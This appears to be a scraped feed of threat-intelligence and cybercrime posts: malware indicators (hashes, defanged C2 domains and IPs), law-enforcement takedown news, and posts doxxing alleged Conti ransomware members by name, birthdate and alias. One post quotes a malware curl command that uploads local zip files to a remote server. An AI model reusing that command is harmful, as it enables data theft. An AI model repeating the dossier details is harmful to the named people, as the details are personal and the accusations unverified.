1/ First comes Stern. Then Tramp (aka Trump). And then the rest. These are the people behind Conti, Trickbot, Black Basta. Their anonymity ends now. 🧵👇

🎁CONTI LEAK: Video they tried to bury! 6+ Conti members on a private jet. TARGET’s birthday — $10M bounty on his head. Filmed by TARGET himself. Original erased — we kept a copy. 🎥Watch and help identify him! Lawrence Abrams pancak3 ςεяβεяμs - мαℓωαяε яεsεαяςнεя #CyberCrime #Leak

💥EXPOSED: We uncovered the Professor behind Conti Ransomware! Dossier, flights, docs, leaks. 🔗Full evidence here: justpaste.it/ilpg5 💰 $10M bounty on the line — and we're burning another $10M to take them down. Share now! #Conti #Trickbot #Cybersecurity

💥 The Reveal: Stern’s New Face Remember when I promised to reveal the new face of the Conti leader after his plastic surgery? The time has come. 📄 Updated Dossier: justpaste.it/ilesl Stern thought changing his appearance would keep him safe. Turns out, it wasn’t enough.

🚨 New Investigation: Bondarenko Arkady — Negotiator for the Conti Group. 🔗Details, analysis, and Dossier: justpaste.it/iqo8u #Conti #Cybercrime #Ransomware

Octalyn Stealer 31a11e53ebee97b9add3d6a7567f7d16 Telegram: https://t[.]me/ZeroTraceD3V YouTube: https://www[.]youtube[.]com/watch?v=TN9yas3uqr0 GitHub: https://github[.]com/luis22d/Octalyn-Stealer-C-Telegram #Octalyn #Stealer #IOC

We have shared a Special Report on IPs infected with Latrodectus malware during 2025-04-26 to 2025-05-20. This is one of the results of the continued international Law Enforcement action called Operation Endgame Season 2.0 Over 44K infected IPs seen: dashboard.shadowserver.org/statistics/com…

A short announcement.

#Bumblebee from nir-soft[.]org (x.com/1ZRR4H/status/…). Botnet: grp0005 C2: 188.40.187.152 (although not flagged by any AV, the IP has been linked to Bumblebee campaigns since approximately April 2024). Bumblebee has been used in ransomware attacks. MalwareHunterTeam

Tsaryov Mikhail Mikhailovich 20.04.1989 Aliases: Mango 🔗Dossier: justpaste.it/ee50n Mango is a key coordinator and the “grey cardinal” within the Conti/TrickBot ecosystem. #Conti #Cybercrime #Ransomware

In een internationale operatie heeft Team High Tech Crime, onder gezag van Landelijk Parket, een sleuteldienst voor ontwikkelaars van #malware onderuitgehaald. Hierdoor worden slachtoffers van malware voorkomen. Lees meer: politie.nl/nieuws/2025/me… #bestrijding #cybercriminaliteit

#LummaStealer #ioc t[.]me/vstalnasral555 => pavpwe[.]run/ptla

Probably the best #ZhongStealer decoy yet. 59af8a487068c555ea22393b0233cb65 Sent to user disguised as an image. "2020505268988jpg.pif" #Signed with EV Certificate "运城市盐湖区风颜商贸有限公司" 🔗🧵

Andrey Yuryevich Zhuykov 18.02.1982 Aliases: Defender, Dif 🔗Dossier: justpaste.it/jcn0i System Administrator of the Conti. Defender is a key technical specialist responsible for the viability of the group’s entire infrastructure. #Conti #Cybercrime #Ransomware

77[.]83[.]207[.]89 AS216341 OPTIMA LLC 🇭🇰 godblessyou[.]world blessyoumother[.]world wheremylifestreet[.]cloud clientforbigbug[.]cloud sunriseopen[.]com #NetSupportRAT ANY.RUN abuse.ch

troubleinternetverif.]com/ HzGTvHpk.txt Xg6fkCIC.txt cloudverifsecure.]com/o8fZccbu.txt 👇 83.222.190.]174 #netsupport #rat Client32.ini bb6ccd9de0cbae55bc41a0984c4a7630 thanksbadbeer.]com beerbadlove.]com Samples bazaar.abuse.ch/browse/tag/83-… app.any.run/tasks/e3ff4332… Mikhail Kasimov

👇 cahasdxca123.]com/lander/jdfcxn/ pass. py exts. py script.enc 👇 "C:\WINDOWS\system32\curl.exe" -X POST https://domainservicecontrol.[com/upload.php -F file=@C:\\Temp\*.zip Related Samples bazaar.abuse.ch/browse/tag/cah… AnyRun app.any.run/tasks/3b904d30… Mikhail Kasimov ܛܔܔܔܛܔܛܔܛ Kelsey

Germany doxxes Conti ransomware and TrickBot ring leader - Sergiu Gatlan bleepingcomputer.com/news/security/… bleepingcomputer.com/news/security/…

Police takes down AVCheck antivirus site used by cybercriminals - Bill Toulas bleepingcomputer.com/news/security/… bleepingcomputer.com/news/security/…

AvCheck[.]net has been seized by law enforcement. AVCheck was used by criminals to test whether their malware is detected by commercial antivirus software before its ready to be used in the wild. Similar to something like VirusTotal. This takedown is apart of Operation Endgame.